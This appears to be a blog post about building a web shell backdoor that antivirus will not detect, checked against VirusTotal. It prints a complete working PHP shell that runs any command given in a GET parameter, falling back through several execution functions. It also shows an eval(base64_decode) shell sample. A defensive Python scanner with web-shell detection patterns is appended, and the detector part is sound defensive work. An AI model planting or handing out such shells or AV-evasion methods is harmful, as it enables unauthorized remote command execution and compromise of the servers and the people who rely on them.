Today I want to try to create a simple undetected (hopefully FUD) web shell backdoor, and I am using VirusTotal to check it (yes, I want them to check my file, lol..).
So, what is FUD?
Fully undetectable (usually shortened as “FUD”) can stand for data that had been encrypted, making it appear to be random noise. It can also stand for software that cannot be detected by anti-viruses when a scan is performed. The term is used in hacker circles to refer to something that appears to be clean to many anti-viruses, even though it is a hacking tool.
Source: https://en.wikipedia.org/wiki/Fully_undetectable
Here is my simple (actually very basic) shell without any obfuscation:

```php
<?php
error_reporting(0);
set_time_limit(0);

// Run the command with whichever execution function the host has left enabled,
// falling back through exec, passthru, system, shell_exec and finally popen.
function eksekusi($in) {
    $out = '';
    if (function_exists('exec')) {
        @exec($in, $out);
        $out = @join("\n", $out);
    } elseif (function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    } elseif (function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    } elseif (function_exists('shell_exec')) {
        $out = shell_exec($in);
    } elseif (is_resource($f = @popen($in, "r"))) {
        $out = "";
        while (!@feof($f)) $out .= fread($f, 1024);
        pclose($f);
    }
    return $out;
}

if (isset($_GET['cmd'])) {
    echo "<pre>";
    echo eksekusi($_GET['cmd']);
}
?>
```
And here is the VirusTotal result:
Now we can see that my web shell was detected by Avast, AVware and Bkav.
Let's try to obfuscate the shell.
And here is the VirusTotal result after obfuscation:
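The other side of this experiment is how a defender would catch such a file on disk before an AV signature exists. The Python scanner below is an added example (not code from the post or from VirusTotal): it scores PHP source on the traits the shell above shows (a function_exists fallback chain over exec functions, request superglobals, @ error suppression) and on the decoder helpers that obfuscated variants lean on. The three sample files, the weights and the threshold are constructed for the example.

```python
import re

# Sinks that turn a string into command or code execution: the ones the shell
# above falls back through, plus proc_open and eval used by obfuscated variants.
EXEC_SINKS = ("exec", "passthru", "system", "shell_exec", "popen", "proc_open", "eval")
SINK_ALT = "|".join(EXEC_SINKS)
REQUEST_SOURCES = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")
# Decoders that usually hide the real payload once a shell is obfuscated.
OBFUSCATION_HINTS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13", "strrev")

def scan_php(src):
    """Score PHP source for web-shell traits; returns (score, reasons). Heuristic, not proof."""
    score, reasons = 0, []
    sinks = [s for s in EXEC_SINKS if re.search(r"(?<![\w$])@?\b%s\s*\(" % s, src)]
    if sinks:
        score += len(sinks)
        reasons.append("execution sinks: " + ", ".join(sinks))
    # Probing for whichever exec function is still enabled is the fallback chain the shell uses.
    probes = re.findall(r"function_exists\s*\(\s*['\"](?:%s)['\"]" % SINK_ALT, src)
    if len(probes) >= 2:
        score += 2
        reasons.append("probes %d exec functions with function_exists" % len(probes))
    if any(s in src for s in REQUEST_SOURCES):
        score += 1
        reasons.append("reads request superglobals")
    # Request data passed straight, or through one decoder call, into a sink.
    if re.search(r"(?:%s)\s*\(\s*(?:\w+\s*\(\s*)?\$_(?:GET|POST|REQUEST|COOKIE)\[" % SINK_ALT, src):
        score += 3
        reasons.append("request value flows into an execution sink")
    if re.search(r"@(?:%s)\s*\(" % SINK_ALT, src):
        score += 1
        reasons.append("suppresses errors on an execution sink with @")
    hints = [h for h in OBFUSCATION_HINTS if h in src]
    if hints:
        score += len(hints)
        reasons.append("decoder helpers: " + ", ".join(hints))
    return score, reasons

def is_suspicious(src, threshold=4):
    return scan_php(src)[0] >= threshold

# Constructed samples, not files from the post: a shell in the style of the one
# above, an obfuscated eval-based variant, and a benign script that also shells out.
SHELL_SAMPLE = r"""<?php error_reporting(0); function run($in) { $out = '';
  if (function_exists('exec')) { @exec($in, $out); $out = join("\n", $out); }
  elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } return $out; }
if (isset($_GET['cmd'])) { echo "<pre>" . run($_GET['cmd']); } ?>"""
OBFUSCATED_SAMPLE = r"""<?php @eval(base64_decode($_POST['p'])); ?>"""
BENIGN_SAMPLE = r"""<?php $tag = shell_exec('git describe --tags'); echo htmlspecialchars($tag); ?>"""
```

A single shell_exec with a constant command scores 1 and stays below the threshold, while both shell samples score well above it; the reasons list is what you would put in the alert.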
Cheers..
I believe that when we upload a file for testing on VirusTotal and it passes, it puts a double check on the file afterwards, because it always accuses it of being malware afterwards.